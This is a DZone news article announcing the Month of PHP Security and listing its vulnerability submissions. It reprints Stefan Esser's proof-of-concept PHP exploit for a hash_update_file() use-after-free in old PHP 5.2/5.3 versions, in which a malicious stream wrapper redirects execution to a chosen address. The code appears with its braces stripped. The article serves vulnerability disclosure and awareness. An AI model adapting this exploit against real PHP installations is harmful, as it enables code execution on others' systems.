Over a million developers have joined DZone.
Platinum Partner

May is PHP Security Month

· Web Dev Zone

The Web Dev Zone is brought to you in partnership with Mendix.  Discover how IT departments looking for ways to keep up with demand for business apps has caused a new breed of developers to surface - the Rapid Application Developer.

Did you know that May is the official Month of PHP Security?  The Month of PHP Security (MOPS) began with Stefan Esser, a PHP security specialist.  It's connected to Esser's Month of PHP Bugs, which started in 2007.  Esser and the PHP community will post submissions throughout the month that describe vulnerabilities in PHP application or the language itself.

The first post, by Esser, is about a vulnerability that was disclosed to the public three years ago during Esser's 2007 Month of PHP Bugs.  The affected versions (PHP 5.2 <= 5.2.13 and PHP 5.3 <= 5.3.2) have a vulnerable hash_update_file() function that reads data from the stream for hashing purposes, and applications can be infected with a malicious userspace stream handler that destroys the hash resource and replaces it with a customized fake resource using a modified hash function and pointer table.  The function will then call the overwritten function pointer when the internal function continues hashing in order to execute malicious code.  The following code will exploit the vulnerability and crash the normal case by triggering an attempted execution at 0x55555555:
define("OFFSET", pack("L",0x55555555));

class AttackStream {
function stream_open($path, $mode, $options, &$opened_path)
return true;

function stream_read($count)
hash_final($GLOBALS['hid'], true);
$GLOBALS['aaaaaaaaaaaaaaaaaaaaaa'] = str_repeat(OFFSET, 3);
return "A";

function stream_eof()
return true;

function stream_seek($offset, $whence)
return false;

stream_wrapper_register("attack", "AttackStream") or die("Failed to register protocol");

$hid = hash_init('md5');
hash_update_file($hid, "attack://nothing");

To protect against this vulnerability, you'll need to implement a resource usage counter for internal functions.

Here are the other submissions that have arrived for the Month of PHP Security (so far):

  • PHP addcslashes() Interruption Information Leak Vulnerability
  • PHP dechunk Filter Signed Comparison Vulnerability
  • PHP sqlite_array_query() Uninitialized Memory Usage Vulnerability
  • PHP sqlite_single_query() Uninitialized Memory Usage Vulnerability
  • sqlite_single_query(), sqlite_array_query() Uninitialized Memory Usage
  • PHP html_entity_decode() Interruption Information Leak Vulnerability
  • PHP shm_put_var() Already Freed Resource Access Vulnerability
  • Context-aware HTML escaping
  • PHP Stream Context Use After Free on Request Shutdown Vulnerability
  • PHP fnmatch() Stack Exhaustion Vulnerability
  • PHP preg_quote() Interruption Information Leak Vulnerability
  • Generating Unpredictable Session IDs and Hashes

PHP Applications
  • ClanTiger Shoutbox Module s_email SQL Injection Vulnerability
  • ClanSphere MySQL Driver Generic SQL Injection Vulnerability
  • ClanSphere Captcha Generator Blind SQL Injection Vulnerability
  • Campsite TinyMCE Article Attachment SQL Injection Vulnerability
  • PHP ZEND_SR Opcode Interruption Address Information Leak Vulnerability
  • PHP ZEND_SL Opcode Interruption Address Information Leak Vulnerability
  • PHP ZEND_BW_XOR Opcode Interruption Address Information Leak Vulnerability
  • DeluxeBB newthread SQL Injection Vulnerability
  • Cacti Graph Viewer SQL Injection Vulnerability
  • The Minerva PHP Fuzzer
  • Xinha WYSIWYG Plugin Configuration Injection Vulnerability
  • Serendipity WYSIWYG Editor Plugin Configuration Injection Vulnerability
  • EFront ask_chat chatrooms_ID SQL Injection Vulnerability

  • A New Open Source Tool: OWASP ESAPI for PHP - For writing PHP security controls
  • PHP Web Security Poster
  • How to Decode a User Space Encoded PHP Script

The Web Dev Zone is brought to you in partnership with Mendix.  Learn more about The Essentials of Digital Innovation and how it needs to be at the heart of every organization.


{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}